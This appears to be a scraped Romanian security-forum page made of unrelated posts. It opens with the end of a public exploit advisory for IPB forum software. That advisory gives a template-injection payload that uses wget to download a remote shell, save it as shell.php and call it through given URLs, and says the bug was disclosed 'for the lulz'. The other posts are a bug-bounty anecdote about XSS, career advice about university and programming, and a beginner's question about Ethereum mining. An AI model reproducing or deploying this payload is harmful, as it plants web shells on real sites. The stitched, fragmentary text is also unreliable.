------------------------------------------------------------------------------------------------------------- ${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}} ------------------------------------------------------------------------------------------------------------- Make sure that this code is at the _bottom_ of the help module textfile, not anywhere else. After this, navigate to the following URL to execute your code: http://vuln.com/index.php?app=core&module=help From here, you can access your shell via the following URL: http://vuln.com/cache/shell.php ------------------------------------------------------------------------------------------------------------- Timeline: - Reported to IPB long ago - Months passed - Very bad communication - Dropped for the lulz [+]---------------------------------------------------------[+] | CONTACT US: | | | | IRC: irc.insecurity.zone (6667/6697) #insecurity | | Twitter: @insecurity | | Website: insecurity.zone | [+]---------------------------------------------------------[+]

Pentru pasionatii de bunataturi: source

Merge doar daca PC-ul nu a fost restartat dupa ce fisierele au fost criptate

Pe redhat majoritatea subdomeniilor daca nu erai logat si intrai pe o pagina unde necesita logarea redirect ul se facea prin service-now care avea un parametru prin GET vulnerabil. Nu am mai gasit poza exacta, am facut o poza dupa video ul de poc. La sap.com la.fel era un XSS prin GET, postez poza diseară cand ajung. Ambele raportate, rezolvate si ca recompensa am luat hof pe ambele. La redhat m au pus sa aleg in care vreau la service now sau redhat😂

Aveam de gand sa fac si eu un program asemanator, poate pana la vara il termin, momentan trebuie sa termin asta : Program postare automata grupuri facebook

Eu incep prin a spune ca am terminat facultatea acum 2 ani si nici pana in prezent nu mi-am ridicat diploma de la facultate. Nu am ridicat diploma pentru ca pur si simplu nu am avut nevoie de ea. Silviu are inca dreptate. In afara de cativa profesori (cei de la OOP, AI si baze de date ) care isi dau interesul restul sunt doar ca sa-ti futa zilele. Daca as da timpul inapoi probabil ca as face aceeasi universitate doar pentru faptul ca as avea timp sa lucrez si pentru ca intr-o multinationala oricat de bun ai fi tot iti cere o diploma. Eu am lucrat din anul 1, sem II full time. Ma duceam doar la laboratoarele si seminariile care erau obligatorii ( 6-8 ore / saptamana ). Dar chiar si asa sa nu crezi ca o sa fie usoara facultatea. Am avut si 7 restante. La inceputul facultatii eram 30 de oameni in grupa si au terminat aproximativ 15. Din cei 15 toti lucreaza in prezent ca si programatori ( site-uri, aplicatii mobile, baze de date etc... ). Cat despre ce inveti la facultate este doar o scurta introducere in lumea programarii. Nu vei invata din facultate ceva daca tu nu iti dai silinta si nu ai pasiune/inclinatie pentru programare. Dovada sta in cele 15 persoane care au renuntat din anul 2 pentru ca deja erau pierduti in spatiu. Si nu pentru ca nu ar fi invatat, ci pentru ca nu reuseau sa inteleaga materiile. Ideea e ca poti alege orice facultate vrei tu. Ori Unibuc ori Poli, viitorul depinde doar de cunostiintele tale. Daca la un interviu vine o persoana de la poli si una de la unibuc o sa fie aleasa persoana care cunoaste mai bine cerintele jobului. Parerea mea este ca in domeniul IT conteaza ce cunostiinte ai, nu ce diploma ai. Succes in orice alegere faci.

YON-FEZ

Salutare!vreau sa ma apuc sa minez ethereum. Am vazut un tutorial pe cryptocompare care te invata cum sa iti creezi adresa si parola.daca inchizi calculatorul si vrei iar sa minezi,trebuie sa te loghezi in cmd? Scuze..poate pare proasta intrebarea.daca are cineva rabdare sa ma invete chestiile de baza,as fi tare recunoscator.